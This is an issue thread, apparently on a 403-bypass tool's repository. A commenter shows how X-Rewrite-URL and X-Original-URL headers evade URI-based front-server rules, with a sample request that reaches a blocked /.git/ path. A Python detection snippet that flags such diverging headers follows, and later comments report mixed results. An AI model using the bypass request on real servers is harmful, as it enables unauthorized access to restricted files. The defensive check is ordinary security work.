X-Original-Url / X-Rewrite-Url bypass
rumiljonov opened this issue · comments
Rumiljonov commented
Hey, I think you are using the X-Original-Url / X-Rewrite-Url
vector in the wrong way. These headers usually help to bypass front-server rules, which are based on the URI, but you don't change the URI while using these headers.
First, normal request returns 403:
GET /.git/ HTTP/1.1
Host: example.com
This attempt to bypass will return 403 too, because the URI hasn't changed and the rule still applies:
GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/
This one should bypass the restriction:
GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/
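From the defender's side, the pattern described above (an override header pointing somewhere other than the request-line URI) is easy to spot in traffic. The following is an added example, not code from this issue or from the tool it concerns; the three sample requests are constructed to mirror the ones in the comment, and the check is meant as the kind of rule a front proxy or log pipeline would apply.

```python
# Added example: flag requests whose X-Original-URL / X-Rewrite-URL value
# differs from the request-line URI (the bypass pattern described above).

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers dict)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return method, path, headers


def classify(raw: str) -> dict:
    """Report which override header (if any) is present and whether it diverges from the URI."""
    _method, path, headers = parse_request(raw)
    result = {"path": path, "override": None, "target": None, "diverges": False}
    for name in OVERRIDE_HEADERS:
        if name in headers:
            result["override"] = name
            result["target"] = headers[name]
            result["diverges"] = headers[name] != path
            break
    return result


def flagged(raw: str) -> bool:
    """True when an override header points somewhere other than the request URI."""
    return classify(raw)["diverges"]


# Constructed sample requests mirroring the three shown in the comment above.
SAMPLES = {
    "plain": "GET /.git/ HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "same_uri": "GET /.git/ HTTP/1.1\r\nHost: example.com\r\nX-Rewrite-URL: /.git/\r\n\r\n",
    "diverging": "GET / HTTP/1.1\r\nHost: example.com\r\nX-Rewrite-URL: /.git/\r\n\r\n",
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, "FLAG" if flagged(req) else "ok", classify(req))
```

Only the third sample is flagged: the first carries no override header and the second's header matches the URI, so a path-based rule still sees `/.git/` in both.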
Do Anh commented
Thank you, fixed in new update.
AbdulRahman commented
Hi, I also checked this method, but it's the home page in the code response.
ler-exploit commented
Hi, I also checked this method, but it's the home page in the code response.
I have the same problem, did you fix it??